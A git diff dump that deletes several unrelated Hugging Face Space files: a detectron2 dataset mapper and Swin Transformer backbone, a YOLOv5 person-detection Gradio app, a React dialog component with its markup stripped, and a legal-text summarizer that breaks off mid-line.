cfg.MODEL.MASK_ON - else: - recompute_boxes = False - - ret = { - "is_train": is_train, - "augmentations": augs, - "image_format": cfg.INPUT.FORMAT, - "use_instance_mask": cfg.MODEL.MASK_ON, - "instance_mask_format": cfg.INPUT.MASK_FORMAT, - "use_keypoint": cfg.MODEL.KEYPOINT_ON, - "recompute_boxes": recompute_boxes, - } - - if cfg.MODEL.KEYPOINT_ON: - ret["keypoint_hflip_indices"] = utils.create_keypoint_hflip_indices(cfg.DATASETS.TRAIN) - - if cfg.MODEL.LOAD_PROPOSALS: - ret["precomputed_proposal_topk"] = ( - cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TRAIN - if is_train - else cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TEST - ) - return ret - - def _transform_annotations(self, dataset_dict, transforms, image_shape): - # USER: Modify this if you want to keep them for some reason. - for anno in dataset_dict["annotations"]: - if not self.use_instance_mask: - anno.pop("segmentation", None) - if not self.use_keypoint: - anno.pop("keypoints", None) - - # USER: Implement additional transformations if you have other types of data - annos = [ - utils.transform_instance_annotations( - obj, transforms, image_shape, keypoint_hflip_indices=self.keypoint_hflip_indices - ) - for obj in dataset_dict.pop("annotations") - if obj.get("iscrowd", 0) == 0 - ] - instances = utils.annotations_to_instances( - annos, image_shape, mask_format=self.instance_mask_format - ) - - # After transforms such as cropping are applied, the bounding box may no longer - # tightly bound the object. As an example, imagine a triangle object - # [(0,0), (2,0), (0,2)] cropped by a box [(1,0),(2,2)] (XYXY format). The tight - # bounding box of the cropped triangle should be [(1,0),(2,1)], which is not equal to - # the intersection of original bounding box and the cropping box. - if self.recompute_boxes: - instances.gt_boxes = instances.gt_masks.get_bounding_boxes() - dataset_dict["instances"] = utils.filter_empty_instances(instances) - - def __call__(self, dataset_dict): - """ - Args: - dataset_dict (dict): Metadata of one image, in Detectron2 Dataset format. - - Returns: - dict: a format that builtin models in detectron2 accept - """ - dataset_dict = copy.deepcopy(dataset_dict) # it will be modified by code below - # USER: Write your own image loading if it's not from a file - image = utils.read_image(dataset_dict["file_name"], format=self.image_format) - utils.check_image_size(dataset_dict, image) - - # USER: Remove if you don't do semantic/panoptic segmentation. - if "sem_seg_file_name" in dataset_dict: - sem_seg_gt = utils.read_image(dataset_dict.pop("sem_seg_file_name"), "L").squeeze(2) - else: - sem_seg_gt = None - - aug_input = T.AugInput(image, sem_seg=sem_seg_gt) - transforms = self.augmentations(aug_input) - image, sem_seg_gt = aug_input.image, aug_input.sem_seg - - image_shape = image.shape[:2] # h, w - # Pytorch's dataloader is efficient on torch.Tensor due to shared-memory, - # but not efficient on large generic data structures due to the use of pickle & mp.Queue. - # Therefore it's important to use torch.Tensor. - dataset_dict["image"] = torch.as_tensor(np.ascontiguousarray(image.transpose(2, 0, 1))) - if sem_seg_gt is not None: - dataset_dict["sem_seg"] = torch.as_tensor(sem_seg_gt.astype("long")) - - # USER: Remove if you don't use pre-computed proposals. - # Most users would not need this feature. - if self.proposal_topk is not None: - utils.transform_proposals( - dataset_dict, image_shape, transforms, proposal_topk=self.proposal_topk - ) - - if not self.is_train: - # USER: Modify this if you want to keep them for some reason. - dataset_dict.pop("annotations", None) - dataset_dict.pop("sem_seg_file_name", None) - return dataset_dict - - if "annotations" in dataset_dict: - self._transform_annotations(dataset_dict, transforms, image_shape) - - return dataset_dict diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/backbone/swin.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/backbone/swin.py deleted file mode 100644 index d5a651d6f4d2933e8f329bd13c04286488f25753..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/backbone/swin.py +++ /dev/null @@ -1,695 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -""" -Implementation of Swin models from :paper:`swin`. - -This code is adapted from https://github.com/SwinTransformer/Swin-Transformer-Object-Detection/blob/master/mmdet/models/backbones/swin_transformer.py with minimal modifications. # noqa --------------------------------------------------------- -Swin Transformer -Copyright (c) 2021 Microsoft -Licensed under The MIT License [see LICENSE for details] -Written by Ze Liu, Yutong Lin, Yixuan Wei --------------------------------------------------------- -LICENSE: https://github.com/SwinTransformer/Swin-Transformer-Object-Detection/blob/461e003166a8083d0b620beacd4662a2df306bd6/LICENSE -""" - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.checkpoint as checkpoint - -from annotator.oneformer.detectron2.modeling.backbone.backbone import Backbone - -_to_2tuple = nn.modules.utils._ntuple(2) - - -class Mlp(nn.Module): - """Multilayer perceptron.""" - - def __init__( - self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.0 - ): - super().__init__() - out_features = out_features or in_features - hidden_features = hidden_features or in_features - self.fc1 = nn.Linear(in_features, hidden_features) - self.act = act_layer() - self.fc2 = nn.Linear(hidden_features, out_features) - self.drop = nn.Dropout(drop) - - def forward(self, x): - x = self.fc1(x) - x = self.act(x) - x = self.drop(x) - x = self.fc2(x) - x = self.drop(x) - return x - - -def window_partition(x, window_size): - """ - Args: - x: (B, H, W, C) - window_size (int): window size - Returns: - windows: (num_windows*B, window_size, window_size, C) - """ - B, H, W, C = x.shape - x = x.view(B, H // window_size, window_size, W // window_size, window_size, C) - windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C) - return windows - - -def window_reverse(windows, window_size, H, W): - """ - Args: - windows: (num_windows*B, window_size, window_size, C) - window_size (int): Window size - H (int): Height of image - W (int): Width of image - Returns: - x: (B, H, W, C) - """ - B = int(windows.shape[0] / (H * W / window_size / window_size)) - x = windows.view(B, H // window_size, W // window_size, window_size, window_size, -1) - x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1) - return x - - -class WindowAttention(nn.Module): - """Window based multi-head self attention (W-MSA) module with relative position bias. - It supports both of shifted and non-shifted window. - Args: - dim (int): Number of input channels. - window_size (tuple[int]): The height and width of the window. - num_heads (int): Number of attention heads. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. - Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set - attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0 - proj_drop (float, optional): Dropout ratio of output. Default: 0.0 - """ - - def __init__( - self, - dim, - window_size, - num_heads, - qkv_bias=True, - qk_scale=None, - attn_drop=0.0, - proj_drop=0.0, - ): - - super().__init__() - self.dim = dim - self.window_size = window_size # Wh, Ww - self.num_heads = num_heads - head_dim = dim // num_heads - self.scale = qk_scale or head_dim**-0.5 - - # define a parameter table of relative position bias - self.relative_position_bias_table = nn.Parameter( - torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), num_heads) - ) # 2*Wh-1 * 2*Ww-1, nH - - # get pair-wise relative position index for each token inside the window - coords_h = torch.arange(self.window_size[0]) - coords_w = torch.arange(self.window_size[1]) - coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Wh, Ww - coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww - relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww - relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2 - relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0 - relative_coords[:, :, 1] += self.window_size[1] - 1 - relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1 - relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww - self.register_buffer("relative_position_index", relative_position_index) - - self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - nn.init.trunc_normal_(self.relative_position_bias_table, std=0.02) - self.softmax = nn.Softmax(dim=-1) - - def forward(self, x, mask=None): - """Forward function. - Args: - x: input features with shape of (num_windows*B, N, C) - mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None - """ - B_, N, C = x.shape - qkv = ( - self.qkv(x) - .reshape(B_, N, 3, self.num_heads, C // self.num_heads) - .permute(2, 0, 3, 1, 4) - ) - q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple) - - q = q * self.scale - attn = q @ k.transpose(-2, -1) - - relative_position_bias = self.relative_position_bias_table[ - self.relative_position_index.view(-1) - ].view( - self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1 - ) # Wh*Ww,Wh*Ww,nH - relative_position_bias = relative_position_bias.permute( - 2, 0, 1 - ).contiguous() # nH, Wh*Ww, Wh*Ww - attn = attn + relative_position_bias.unsqueeze(0) - - if mask is not None: - nW = mask.shape[0] - attn = attn.view(B_ // nW, nW, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0) - attn = attn.view(-1, self.num_heads, N, N) - attn = self.softmax(attn) - else: - attn = self.softmax(attn) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B_, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - - -class SwinTransformerBlock(nn.Module): - """Swin Transformer Block. - Args: - dim (int): Number of input channels. - num_heads (int): Number of attention heads. - window_size (int): Window size. - shift_size (int): Shift size for SW-MSA. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float, optional): Stochastic depth rate. Default: 0.0 - act_layer (nn.Module, optional): Activation layer. Default: nn.GELU - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__( - self, - dim, - num_heads, - window_size=7, - shift_size=0, - mlp_ratio=4.0, - qkv_bias=True, - qk_scale=None, - drop=0.0, - attn_drop=0.0, - drop_path=0.0, - act_layer=nn.GELU, - norm_layer=nn.LayerNorm, - ): - super().__init__() - self.dim = dim - self.num_heads = num_heads - self.window_size = window_size - self.shift_size = shift_size - self.mlp_ratio = mlp_ratio - assert 0 <= self.shift_size < self.window_size, "shift_size must in 0-window_size" - - self.norm1 = norm_layer(dim) - self.attn = WindowAttention( - dim, - window_size=_to_2tuple(self.window_size), - num_heads=num_heads, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - attn_drop=attn_drop, - proj_drop=drop, - ) - - if drop_path > 0.0: - from timm.models.layers import DropPath - - self.drop_path = DropPath(drop_path) - else: - self.drop_path = nn.Identity() - self.norm2 = norm_layer(dim) - mlp_hidden_dim = int(dim * mlp_ratio) - self.mlp = Mlp( - in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop - ) - - self.H = None - self.W = None - - def forward(self, x, mask_matrix): - """Forward function. - Args: - x: Input feature, tensor size (B, H*W, C). - H, W: Spatial resolution of the input feature. - mask_matrix: Attention mask for cyclic shift. - """ - B, L, C = x.shape - H, W = self.H, self.W - assert L == H * W, "input feature has wrong size" - - shortcut = x - x = self.norm1(x) - x = x.view(B, H, W, C) - - # pad feature maps to multiples of window size - pad_l = pad_t = 0 - pad_r = (self.window_size - W % self.window_size) % self.window_size - pad_b = (self.window_size - H % self.window_size) % self.window_size - x = F.pad(x, (0, 0, pad_l, pad_r, pad_t, pad_b)) - _, Hp, Wp, _ = x.shape - - # cyclic shift - if self.shift_size > 0: - shifted_x = torch.roll(x, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2)) - attn_mask = mask_matrix - else: - shifted_x = x - attn_mask = None - - # partition windows - x_windows = window_partition( - shifted_x, self.window_size - ) # nW*B, window_size, window_size, C - x_windows = x_windows.view( - -1, self.window_size * self.window_size, C - ) # nW*B, window_size*window_size, C - - # W-MSA/SW-MSA - attn_windows = self.attn(x_windows, mask=attn_mask) # nW*B, window_size*window_size, C - - # merge windows - attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C) - shifted_x = window_reverse(attn_windows, self.window_size, Hp, Wp) # B H' W' C - - # reverse cyclic shift - if self.shift_size > 0: - x = torch.roll(shifted_x, shifts=(self.shift_size, self.shift_size), dims=(1, 2)) - else: - x = shifted_x - - if pad_r > 0 or pad_b > 0: - x = x[:, :H, :W, :].contiguous() - - x = x.view(B, H * W, C) - - # FFN - x = shortcut + self.drop_path(x) - x = x + self.drop_path(self.mlp(self.norm2(x))) - - return x - - -class PatchMerging(nn.Module): - """Patch Merging Layer - Args: - dim (int): Number of input channels. - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__(self, dim, norm_layer=nn.LayerNorm): - super().__init__() - self.dim = dim - self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False) - self.norm = norm_layer(4 * dim) - - def forward(self, x, H, W): - """Forward function. - Args: - x: Input feature, tensor size (B, H*W, C). - H, W: Spatial resolution of the input feature. - """ - B, L, C = x.shape - assert L == H * W, "input feature has wrong size" - - x = x.view(B, H, W, C) - - # padding - pad_input = (H % 2 == 1) or (W % 2 == 1) - if pad_input: - x = F.pad(x, (0, 0, 0, W % 2, 0, H % 2)) - - x0 = x[:, 0::2, 0::2, :] # B H/2 W/2 C - x1 = x[:, 1::2, 0::2, :] # B H/2 W/2 C - x2 = x[:, 0::2, 1::2, :] # B H/2 W/2 C - x3 = x[:, 1::2, 1::2, :] # B H/2 W/2 C - x = torch.cat([x0, x1, x2, x3], -1) # B H/2 W/2 4*C - x = x.view(B, -1, 4 * C) # B H/2*W/2 4*C - - x = self.norm(x) - x = self.reduction(x) - - return x - - -class BasicLayer(nn.Module): - """A basic Swin Transformer layer for one stage. - Args: - dim (int): Number of feature channels - depth (int): Depths of this stage. - num_heads (int): Number of attention head. - window_size (int): Local window size. Default: 7. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0 - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - downsample (nn.Module | None, optional): Downsample layer at the end of the layer. - Default: None - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. - """ - - def __init__( - self, - dim, - depth, - num_heads, - window_size=7, - mlp_ratio=4.0, - qkv_bias=True, - qk_scale=None, - drop=0.0, - attn_drop=0.0, - drop_path=0.0, - norm_layer=nn.LayerNorm, - downsample=None, - use_checkpoint=False, - ): - super().__init__() - self.window_size = window_size - self.shift_size = window_size // 2 - self.depth = depth - self.use_checkpoint = use_checkpoint - - # build blocks - self.blocks = nn.ModuleList( - [ - SwinTransformerBlock( - dim=dim, - num_heads=num_heads, - window_size=window_size, - shift_size=0 if (i % 2 == 0) else window_size // 2, - mlp_ratio=mlp_ratio, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop=drop, - attn_drop=attn_drop, - drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path, - norm_layer=norm_layer, - ) - for i in range(depth) - ] - ) - - # patch merging layer - if downsample is not None: - self.downsample = downsample(dim=dim, norm_layer=norm_layer) - else: - self.downsample = None - - def forward(self, x, H, W): - """Forward function. - Args: - x: Input feature, tensor size (B, H*W, C). - H, W: Spatial resolution of the input feature. - """ - - # calculate attention mask for SW-MSA - Hp = int(np.ceil(H / self.window_size)) * self.window_size - Wp = int(np.ceil(W / self.window_size)) * self.window_size - img_mask = torch.zeros((1, Hp, Wp, 1), device=x.device) # 1 Hp Wp 1 - h_slices = ( - slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None), - ) - w_slices = ( - slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None), - ) - cnt = 0 - for h in h_slices: - for w in w_slices: - img_mask[:, h, w, :] = cnt - cnt += 1 - - mask_windows = window_partition( - img_mask, self.window_size - ) # nW, window_size, window_size, 1 - mask_windows = mask_windows.view(-1, self.window_size * self.window_size) - attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) - attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill( - attn_mask == 0, float(0.0) - ) - - for blk in self.blocks: - blk.H, blk.W = H, W - if self.use_checkpoint: - x = checkpoint.checkpoint(blk, x, attn_mask) - else: - x = blk(x, attn_mask) - if self.downsample is not None: - x_down = self.downsample(x, H, W) - Wh, Ww = (H + 1) // 2, (W + 1) // 2 - return x, H, W, x_down, Wh, Ww - else: - return x, H, W, x, H, W - - -class PatchEmbed(nn.Module): - """Image to Patch Embedding - Args: - patch_size (int): Patch token size. Default: 4. - in_chans (int): Number of input image channels. Default: 3. - embed_dim (int): Number of linear projection output channels. Default: 96. - norm_layer (nn.Module, optional): Normalization layer. Default: None - """ - - def __init__(self, patch_size=4, in_chans=3, embed_dim=96, norm_layer=None): - super().__init__() - patch_size = _to_2tuple(patch_size) - self.patch_size = patch_size - - self.in_chans = in_chans - self.embed_dim = embed_dim - - self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) - if norm_layer is not None: - self.norm = norm_layer(embed_dim) - else: - self.norm = None - - def forward(self, x): - """Forward function.""" - # padding - _, _, H, W = x.size() - if W % self.patch_size[1] != 0: - x = F.pad(x, (0, self.patch_size[1] - W % self.patch_size[1])) - if H % self.patch_size[0] != 0: - x = F.pad(x, (0, 0, 0, self.patch_size[0] - H % self.patch_size[0])) - - x = self.proj(x) # B C Wh Ww - if self.norm is not None: - Wh, Ww = x.size(2), x.size(3) - x = x.flatten(2).transpose(1, 2) - x = self.norm(x) - x = x.transpose(1, 2).view(-1, self.embed_dim, Wh, Ww) - - return x - - -class SwinTransformer(Backbone): - """Swin Transformer backbone. - A PyTorch impl of : `Swin Transformer: Hierarchical Vision Transformer using Shifted - Windows` - https://arxiv.org/pdf/2103.14030 - Args: - pretrain_img_size (int): Input image size for training the pretrained model, - used in absolute postion embedding. Default 224. - patch_size (int | tuple(int)): Patch size. Default: 4. - in_chans (int): Number of input image channels. Default: 3. - embed_dim (int): Number of linear projection output channels. Default: 96. - depths (tuple[int]): Depths of each Swin Transformer stage. - num_heads (tuple[int]): Number of attention head of each stage. - window_size (int): Window size. Default: 7. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4. - qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. - drop_rate (float): Dropout rate. - attn_drop_rate (float): Attention dropout rate. Default: 0. - drop_path_rate (float): Stochastic depth rate. Default: 0.2. - norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm. - ape (bool): If True, add absolute position embedding to the patch embedding. Default: False. - patch_norm (bool): If True, add normalization after patch embedding. Default: True. - out_indices (Sequence[int]): Output from which stages. - frozen_stages (int): Stages to be frozen (stop grad and set eval mode). - -1 means not freezing any parameters. - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. - """ - - def __init__( - self, - pretrain_img_size=224, - patch_size=4, - in_chans=3, - embed_dim=96, - depths=(2, 2, 6, 2), - num_heads=(3, 6, 12, 24), - window_size=7, - mlp_ratio=4.0, - qkv_bias=True, - qk_scale=None, - drop_rate=0.0, - attn_drop_rate=0.0, - drop_path_rate=0.2, - norm_layer=nn.LayerNorm, - ape=False, - patch_norm=True, - out_indices=(0, 1, 2, 3), - frozen_stages=-1, - use_checkpoint=False, - ): - super().__init__() - - self.pretrain_img_size = pretrain_img_size - self.num_layers = len(depths) - self.embed_dim = embed_dim - self.ape = ape - self.patch_norm = patch_norm - self.out_indices = out_indices - self.frozen_stages = frozen_stages - - # split image into non-overlapping patches - self.patch_embed = PatchEmbed( - patch_size=patch_size, - in_chans=in_chans, - embed_dim=embed_dim, - norm_layer=norm_layer if self.patch_norm else None, - ) - - # absolute position embedding - if self.ape: - pretrain_img_size = _to_2tuple(pretrain_img_size) - patch_size = _to_2tuple(patch_size) - patches_resolution = [ - pretrain_img_size[0] // patch_size[0], - pretrain_img_size[1] // patch_size[1], - ] - - self.absolute_pos_embed = nn.Parameter( - torch.zeros(1, embed_dim, patches_resolution[0], patches_resolution[1]) - ) - nn.init.trunc_normal_(self.absolute_pos_embed, std=0.02) - - self.pos_drop = nn.Dropout(p=drop_rate) - - # stochastic depth - dpr = [ - x.item() for x in torch.linspace(0, drop_path_rate, sum(depths)) - ] # stochastic depth decay rule - - # build layers - self.layers = nn.ModuleList() - for i_layer in range(self.num_layers): - layer = BasicLayer( - dim=int(embed_dim * 2**i_layer), - depth=depths[i_layer], - num_heads=num_heads[i_layer], - window_size=window_size, - mlp_ratio=mlp_ratio, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop=drop_rate, - attn_drop=attn_drop_rate, - drop_path=dpr[sum(depths[:i_layer]) : sum(depths[: i_layer + 1])], - norm_layer=norm_layer, - downsample=PatchMerging if (i_layer < self.num_layers - 1) else None, - use_checkpoint=use_checkpoint, - ) - self.layers.append(layer) - - num_features = [int(embed_dim * 2**i) for i in range(self.num_layers)] - self.num_features = num_features - - # add a norm layer for each output - for i_layer in out_indices: - layer = norm_layer(num_features[i_layer]) - layer_name = f"norm{i_layer}" - self.add_module(layer_name, layer) - - self._freeze_stages() - self._out_features = ["p{}".format(i) for i in self.out_indices] - self._out_feature_channels = { - "p{}".format(i): self.embed_dim * 2**i for i in self.out_indices - } - self._out_feature_strides = {"p{}".format(i): 2 ** (i + 2) for i in self.out_indices} - self._size_devisibility = 32 - - self.apply(self._init_weights) - - def _freeze_stages(self): - if self.frozen_stages >= 0: - self.patch_embed.eval() - for param in self.patch_embed.parameters(): - param.requires_grad = False - - if self.frozen_stages >= 1 and self.ape: - self.absolute_pos_embed.requires_grad = False - - if self.frozen_stages >= 2: - self.pos_drop.eval() - for i in range(0, self.frozen_stages - 1): - m = self.layers[i] - m.eval() - for param in m.parameters(): - param.requires_grad = False - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - nn.init.trunc_normal_(m.weight, std=0.02) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - @property - def size_divisibility(self): - return self._size_divisibility - - def forward(self, x): - """Forward function.""" - x = self.patch_embed(x) - - Wh, Ww = x.size(2), x.size(3) - if self.ape: - # interpolate the position embedding to the corresponding size - absolute_pos_embed = F.interpolate( - self.absolute_pos_embed, size=(Wh, Ww), mode="bicubic" - ) - x = (x + absolute_pos_embed).flatten(2).transpose(1, 2) # B Wh*Ww C - else: - x = x.flatten(2).transpose(1, 2) - x = self.pos_drop(x) - - outs = {} - for i in range(self.num_layers): - layer = self.layers[i] - x_out, H, W, x, Wh, Ww = layer(x, Wh, Ww) - - if i in self.out_indices: - norm_layer = getattr(self, f"norm{i}") - x_out = norm_layer(x_out) - - out = x_out.view(-1, H, W, self.num_features[i]).permute(0, 3, 1, 2).contiguous() - outs["p{}".format(i)] = out - - return outs diff --git a/spaces/coutant/yolo-person/app.py b/spaces/coutant/yolo-person/app.py deleted file mode 100644 index 9c73a3b76b0b984a8b0f8326da7f8e95ea074742..0000000000000000000000000000000000000000 --- a/spaces/coutant/yolo-person/app.py +++ /dev/null @@ -1,32 +0,0 @@ -from typing import List -import PIL.Image -import torch -import gradio as gr - -article = "

      Github Repo

      " - -model = torch.hub.load('ultralytics/yolov5', 'yolov5l') -model.classes = [ 0 ] # only considering class 'person' and not the 79 other classes... -model.conf = 0.6 # only considering detection above the threshold. - -def inference(img:PIL.Image.Image, threshold:float=0.6): - if img is None: - return None,0 - images:List[PIL.Image.Image] = [ img ] # inference operates on a list of images - model.conf = threshold - detections = model(images, size=640) - predictions:torch.Tensor = detections.pred[0] # the predictions for our single image - result_image = detections.ims[0] if hasattr(detections, "ims") else detections.imgs[0] # either model.common.Detections or torchvision.Detections - detections.render() # bounding boxes and labels added into image - return result_image, predictions.size(dim=0) # image and number of detections - -gr.Interface( - fn = inference, - inputs = [ gr.Image(type="pil", label="Input"), gr.Slider(minimum=0.5, maximum=0.9, step=0.05, value=0.7, label="Confidence threshold") ], - outputs = [ gr.Image(type="pil", label="Output"), gr.Label(label="nb of persons detected for given confidence threshold") ], - title="Person detection with YOLO v5", - description="Person detection, you can twik the corresponding confidence threshold. Good results even when face not visible.", - article=article, - examples=[['data/businessmen-612.jpg'], ['data/businessmen-back.jpg']], - allow_flagging="never" -).launch(debug=True, enable_queue=True) \ No newline at end of file diff --git a/spaces/cozyanduofen/bingo/src/components/ui/dialog.tsx b/spaces/cozyanduofen/bingo/src/components/ui/dialog.tsx deleted file mode 100644 index 925e77fe7858fb218b5115b4e225174a886e0f02..0000000000000000000000000000000000000000 --- a/spaces/cozyanduofen/bingo/src/components/ui/dialog.tsx +++ /dev/null @@ -1,128 +0,0 @@ -'use client' - -import * as React from 'react' -import * as DialogPrimitive from '@radix-ui/react-dialog' - -import { cn } from '@/lib/utils' -import { IconClose } from '@/components/ui/icons' - -const Dialog = DialogPrimitive.Root - -const DialogTrigger = DialogPrimitive.Trigger - -const DialogPortal = ({ - className, - children, - ...props -}: DialogPrimitive.DialogPortalProps) => ( - -
      - {children} -
      -
      -) -DialogPortal.displayName = DialogPrimitive.Portal.displayName - -const DialogOverlay = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -DialogOverlay.displayName = DialogPrimitive.Overlay.displayName - -const DialogContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - {children} - - - Close - - - -)) -DialogContent.displayName = DialogPrimitive.Content.displayName - -const DialogHeader = ({ - className, - ...props -}: React.HTMLAttributes) => ( -
      -) -DialogHeader.displayName = 'DialogHeader' - -const DialogFooter = ({ - className, - ...props -}: React.HTMLAttributes) => ( -
      -) -DialogFooter.displayName = 'DialogFooter' - -const DialogTitle = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -DialogTitle.displayName = DialogPrimitive.Title.displayName - -const DialogDescription = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -DialogDescription.displayName = DialogPrimitive.Description.displayName - -export { - Dialog, - DialogTrigger, - DialogContent, - DialogHeader, - DialogFooter, - DialogTitle, - DialogDescription -} diff --git a/spaces/d0r1h/LegSum/Summarizer/Extractive.py b/spaces/d0r1h/LegSum/Summarizer/Extractive.py deleted file mode 100644 index c6e3f76284527674a257c598ab24e964a90ac760..0000000000000000000000000000000000000000 --- a/spaces/d0r1h/LegSum/Summarizer/Extractive.py +++ /dev/null @@ -1,95 +0,0 @@ -import nltk -import torch -from summarizer import Summarizer -from sumy.nlp.tokenizers import Tokenizer -from sumy.summarizers.lsa import LsaSummarizer -from sumy.parsers.plaintext import PlaintextParser -from sumy.summarizers.lex_rank import LexRankSummarizer -from sumy.summarizers.sum_basic import SumBasicSummarizer -from transformers import AutoTokenizer, AutoModelForSeq2SeqLM - -nltk.download('punkt') - -def extractive(method, file): - sumarizer = method - sentences_ = [] - doc_ = PlaintextParser(file, Tokenizer("en")).document - for sentence in sumarizer(doc_, 5): - sentences_.append(str(sentence)) - summm_ = " ".join(sentences_) - return summm_ - -def summarize(file, model): - - with open(file.name) as f: - doc = f.read() - - if model == "Pegasus": - checkpoint = "google/pegasus-billsum" - tokenizer = AutoTokenizer.from_pretrained(checkpoint) - model = AutoModelForSeq2SeqLM.from_pretrained(checkpoint) - inputs = tokenizer(doc, - max_length=1024, - truncation=True, - return_tensors="pt") - - summary_ids = model.generate(inputs["input_ids"]) - summary = tokenizer.batch_decode(summary_ids, - skip_special_tokens=True, - clean_up_tokenization_spaces=False) - summary = summary[0] - elif model == "LEDBill": - tokenizer = AutoTokenizer.from_pretrained("d0r1h/LEDBill") - model = AutoModelForSeq2SeqLM.from_pretrained("d0r1h/LEDBill", return_dict_in_generate=True) - - input_ids = tokenizer(doc, return_tensors="pt").input_ids - global_attention_mask = torch.zeros_like(input_ids) - global_attention_mask[:, 0] = 1 - - sequences = model.generate(input_ids, global_attention_mask=global_attention_mask).sequences - summary = tokenizer.batch_decode(sequences, skip_special_tokens=True) - - summary = summary[0] - - elif model == "ILC": - tokenizer = AutoTokenizer.from_pretrained("d0r1h/led-base-ilc") - model = AutoModelForSeq2SeqLM.from_pretrained("d0r1h/led-base-ilc", return_dict_in_generate=True) - - input_ids = tokenizer(doc, return_tensors="pt").input_ids - global_attention_mask = torch.zeros_like(input_ids) - global_attention_mask[:, 0] = 1 - - sequences = model.generate(input_ids, global_attention_mask=global_attention_mask).sequences - summary = tokenizer.batch_decode(sequences, skip_special_tokens=True) - - summary = summary[0] - elif model == "Distill": - checkpoint = "sshleifer/distill-pegasus-cnn-16-4" - tokenizer = AutoTokenizer.from_pretrained(checkpoint) - model = AutoModelForSeq2SeqLM.from_pretrained(checkpoint) - inputs = tokenizer(doc, - max_length=1024, - truncation=True, - return_tensors="pt") - - summary_ids = model.generate(inputs["input_ids"]) - summary = tokenizer.batch_decode(summary_ids, - skip_special_tokens=True, - clean_up_tokenization_spaces=False) - summary = summary[0] - - elif model == "TextRank": - summary = extractive(LexRankSummarizer(), doc) - - elif model == "SumBasic": - summary = extractive(SumBasicSummarizer(), doc) - - elif model == "Lsa": - summary 